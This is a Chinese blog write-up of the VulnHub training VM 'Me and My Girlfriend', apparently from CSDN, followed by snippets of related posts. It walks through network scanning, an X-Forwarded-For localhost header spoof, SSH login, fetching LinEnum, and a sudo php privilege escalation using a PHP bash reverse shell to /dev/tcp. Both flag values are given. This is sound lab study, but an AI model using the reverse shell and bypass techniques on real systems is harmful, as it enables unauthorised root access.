Me and My Girlfriend靶机实验

已于 2024-01-07 10:49:06 修改
阅读量536 收藏 1
点赞数
文章标签: 安全 网络 web安全
于 2022-12-09 20:36:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdfsergfr/article/details/128249533
版权

目录

靶机描述:

准备:

信息收集(一键三连IP、端口、目录扫描)

ip:

端口扫描:

目录扫描:

需要用到kali中的dirsearch。

漏洞分析

渗透攻击

提权:

这里我们可以尝试使用漏洞检查脚本

靶机的下载地址:Me and My Girlfriend: 1 ~ VulnHub

靶机描述:

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", And Bob asks for your help to get what Alice is hiding and get full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

Flag:

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}

准备:

1.下载镜像,导入VMvare

2.虚拟机的网络适配器需要由桥接模式改为NAT模式(这样才能给靶机分配一个ip)

3.打开靶机虚拟机

4.打开攻击机kali

信息收集(一键三连IP、端口、目录扫描)

ip:

在攻击机kali中输入

netdiscover

发现靶机的ip为192.168.159.141

 端口扫描:

nmap -p- -A 192.168.159.141

发现开放了22、80端口

 22端口的ssh服务在1.0版本的时候是有漏洞的,但这里是2.0版本,漏洞很少。

目录扫描:

需要用到kali中的dirsearch

第一次使用需要安装diesearch

安装之前建议先更新,更新要进入超级用户

sudo su-
apt-get update
apt-get install dirsearch

dirsearch安装完成进行目录扫描

dirsearch -u http://192.168.159.141 -e*

观察不同颜色的目录

漏洞分析

端口:

打开了80和22端口

22端口的ssh服务在1.0版本的时候是有漏洞的,但这里是2.0版本,漏洞很少。可能用到爆破,但是我们没有字典。

目录扫描:

扫描到的目录中,robots.txt里有一个文件。(查重文件,里面有不允许我们进行查重的目录)

进入robots.txt 敏感信息泄露  同时爆露出一个新的页面heyhoo.txt

进入heyhoo.txt

 没有有用的信息

  登录页面:

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!

页面信息提示我们本地登录

渗透攻击

此时本地登录需要用到X-F-F请求头

X-Forwarded-ForXFF

是用来识别通过HTTP代理负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段

我们通过添加这个字段,来让服务器识别我们为本地登录。

在bp proxy模块下的Options的Match and Replace中添加一条匹配替换规则。

X-Forwarded-For: localhost

首先,我们先来使用本地登录

在登录页面抓一个包,此时X-F-F响应头已经完成

把包放掉,进入本地主页

登录:

弱口令爆破失败

注册:

但是注册一直不成功。

这里我借鉴了别人的账号、密码

已知打开了22端口,且获得了账号密码,此时进行ssh连接

使用shell工具进行连接

这里连接到ssh后对alice的文件进行查看,发现

Flag1

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

提权:

使用漏洞检查脚本

通过python简单的起一个http服务。

python2 -m SimpleHTTPServer

然后在目标靶机上拉取提权检查脚本。

wget http://192.168.11.135:8000/LinEnum.sh 

这里的LinEnum.sh需要现在github上面下载

下载地址:https://github.com/rebootuser/LinEnum

 LinEnum.sh文件放在桌面

然后在目标靶机上拉取提权检查脚本。

wget http://192.168.159.135:8000/LinEnum.sh

 给权限并执行

chmod 777 LinEnum.sh
./ LinEnum.sh

 

我们可以在不提供密码的情况下sudo,可以在/usr/bin/php利用

我们可以去利用。

在finalshell中 vim 1.php

写一个php脚本。

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.159.135/10086 0>&1'");

?>

 kali开启一个监听10086端口

 使用sudo命令执行脚本。

sudo php 1.php

因为我们是以sudo(root权限)来执行脚本的,所以会反弹过去root权限的shell。

Cd ..

Cd ..

Ls

Flag2

Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}


sdfsergfr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机Me and My Girlfriend : 1-Writeup渗透测试
Long_gone的博客
01-18 842
一、信息收集 打开靶机后,先用netdiscover进行IP扫描: 确定靶机IP为192.168.1.106后,扫描它的端口开放情况: namp -sV -A -p 0-65535 192.168.1.106 发现靶机只开放了22和80端口,打开80端口看一下: 这段话的意思是:你是谁?黑客吗?对不起,本网站只能在本地访问! 然后试着先扫描一下目录: dirb http://192.168...
【VulnHub系列】Me-and-My-Girlfriend-靶机
薛定谔嘚喵博客
03-12 728
1.信息收集端口发现80和22通过80,使用x-forwarded-for头,就可以看到web后台扫描80的目录,看到一些空白的php文件,虽然前端是空白,后面如果可以查看php内容,这些就是重点查看对象2.web权限进入后台,添加用户后可以通过user_id越权查看所有的用户信息3.shell权限利用前面得到的信息,对ssh进行尝试登录4.权限维持使用ssh进行连接登录,发现flag5.提权(两种方式)
靶机渗透之Me-and-My-Girlfriend
weixin_64267091的博客
12-20 1191
总结一下打靶过程:第一步:信息收集。主机发现和端口扫描,确定端口号基本上是80端口。然后进行漏洞扫描,没有扫出来有用的信息,最后就是目录扫描,扫出来一些有用的目录第二步:web渗透。打开扫描的目录,提示只允许本地登录,所以用BurpSuite改包在请求头添加x-forwarded-for:localhost绕过本地登录。
靶机攻略| Me-and-My-Girlfriend |
niext的博客
10-23 1570
1.靶机下载:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2.靶机介绍 难度:✯✯✯ 目标:拿到两个flag 3.启动虚拟机 3.1信息搜集 主机发现 使用arp-scan扫描出3个ip地址: 第一个是我的VM8网卡,第三个是我设置的网关,如此确定第二个是目标IP。并且我查看了靶机的MAC地址与扫描出来的一致。 端口扫描 使用nmap扫描发现:22,80.
应急响应 –以me and my girlfriend 靶机为例
qq_58672257的博客
12-13 971
可以看到,只有root用户,但是root用户并没有登录,说明是alice做了一些操作进行了提权。可以看到,我们的ssh被暴力破解了,除了root用户,其他用户登录使用的ip都是88.1。从日志中我们可以发现,存在了越权访问漏洞,导致了alice用户被滥用。从日志中我们可以发现,存在了越权访问漏洞,导致了alice用户被滥用。前面已经进行了靶机的渗透测试,接下来我们以蓝方视角来进行应急响应。.bash_history这个文件是命令历史记录,我们查看一下。查看24小时内,有没有什么文件被修改过。
靶机Me And My Girlfriend
最新发布
zzf011900的博客
03-19 292
逐个排除所以靶机ip为192.168.31.143 也可以用netdiscover扫描。可以得知 我们可以用 x forwarded for 访问一下。进入my_secret看看 cd 发现flag 和一个笔记。使用find命令,全局搜索文件名包含flag字样的文件。标签挨个点一下,发现除了注册页面,其他地方都没有什么。就是x-forwarded-for伪装成本地访问。登录后发现url 有id 尝试更改一下。Cat flag 拿到一个flag。Sudo -l 查看权限。查看目录 ls -al。
Me-and-My-Girlfriend 靶机
ppbgi的博客
06-11 289
信息收集 nmap -sP 192.168.1.1-254 查看源码
Vulnhub靶机之Me-and-My-Girlfriend-1
m0_52328368的博客
07-23 620
vulnhub靶场 Me-and-My-Girlfriend-1 详细操作过程
Me and My Girlfriend靶机渗透
她叫常玉莹
09-07 672
背景描述:这个VM告诉我们,有一对恋人,即Alice和Bob,这对夫妻本来很浪漫,但是自从Alice在一家私人公司“ Ceban Corp”工作以来,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,而鲍勃(Bob)寻求您的帮助,以获取爱丽丝(Alice)隐藏的内容并获得对该公司的完全访问权限! 信息收集漏洞利用提权 信息收集 内网主机发现比较喜欢使用arp-scan工具,工具轻量扫描速度比较快。扫描结果得知目标靶机的ip地址为192.168.0.106 使用nmap进行扫描 得知目标端口开放了22端口.
靶机记录:me and mygirlfriend
phosphophylite的博客
11-16 3911
注: 这是9月份第一台完全打下来的靶机,后续会慢慢补上其他记录 再注: 第一次完美打下来靶机,有点激动,笔记就写的罗里吧嗦了,如果你不幸刷到了还请见谅! 靶机名: me and mygirlfriend 安装: 白嫖到ova文件后一键安装 注意: 由于靶机模拟的是同一局域网内的一台设备,所以vmware导入时选择nat连接方式 安装好后登录kali,首先使用命令arp-scan -l,扫描当前存活动主机 多了一个192.168.88.128,这就是靶机的ip地址了 知道ip后可以用nmap扫描端口 这里根
LinEnum:脚本化本地Linux枚举和特权升级检查
02-24
LinEnum 有关更多信息,请访问 注意:导出功能目前处于试验阶段。 一般用法: 版本0.982 示例:./LinEnum.sh -s -k关键字-r report -e / tmp / -t 选项: -k输入关键字 -e输入导出位置 -t包括详尽的(冗长的)测试 -s提供当前用户密码以检查sudo权限(不安全) -r输入报告名称 -h显示此帮助文本 无选项运行=扫描受限/无输出文件 -e要求用户输入输出位置,即/ tmp / export。 如果此位置不存在,将创建它。 -r要求用户输入报告名称。 该报告(.txt文件)将保存到当前工作目录。 -t执行彻底(缓慢)测试。 如果没有此开关,将执行默认的“快速”扫描。 -s使用提供了密码的当前用户来检查sudo权限-请注意,这是不安全的,仅用于CTF! -k一个可选的开关,用户可以在该开关中搜索许多文件中的单个关键字
LinEnum-master.rar
09-21
LinEnum.sh提权脚本。具体使用见CSDN文章:https://blog.csdn.net/qq_41453285/article/details/101104225
Vulnhub靶机渗透之Me and My Girlfriend
realmels的博客
06-28 2130
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell 介绍 Vulnhub它是一个提供各种漏洞环境的平台,官方链接:https://www.vuln.
MeAndMyGirfrend靶机
YshiliuH的博客
10-06 379
MeandMyGirlfriend
Me-and-My-girlfriend-1靶机实战-vuluhub系列(完结)
PANDA墨森的博客
07-11 861
这是vuluhub靶机实战系列完结篇了,本次主要知识点为:XFF头绕过限制,越权漏洞、sudo滥用提权之php命令 靶机下载地址: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13234298.html #001环境搭建 攻击机kali:192.168.136.129 靶机Me-and-My-girlfriend-1:192.168..
靶机渗透一 me and my girlfriend
m0_62642153的博客
05-10 113
me and my girlfiend
靶机测试 Me and My Girlfriend1笔记
qq_56426046的博客
01-08 591
用这个X-Forwarded-For Header插件 再增加上 127.0.0.1 即可绕过。把id修改为1即可获取 id=1 用户的账号和密码。确定靶机地址192.168.1.103。发现 php 不需要密码就可以执行操作。点击个人信息查看源代码可以看见密码。修改id查看是否可以看到别人的密码。发现注册登录和注册页面 注册用户。后来,错过也成了人间常态。
vulnhub之Me-and-My-Girlfriend-1
底层社会中的弱智
01-03 662
像之前的套路一样,nmap真香 找到了目标主机,IP为172.16.12.15 进行端口侦测: 22号端口是ssh服务(弱口令登录,爆破,一些攻击载荷) 80号端口中间件是apache的2.4.7(常规的网站漏洞扫面) 先打开网页看看: 注意提示信息很重要!意思就是让我们抓包改包,把x-forwarded-for这个参数的值改为本地(localhost) 启动bp来尝试: ...
LinEnum提权辅助脚本使用指南
SHELLCODE_8BIT的博客
11-18 1048
主要做了信息收集,其中包含了可提权项,主要支持功能如下,其中可以提权的检测项标红表示。
I cry whenever I have an argument with my girlfriend, can you give me some advice?
09-16
### 回答1: 我建议你和你女友多沟通,尽量用理性的话语让彼此能够理解对方,这样可以减少争吵。同时,你也可以尝试去做一些让你感到开心的事情,比如做运动、聆听音乐、看电影等等,让自己释放压力,有助于你更好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值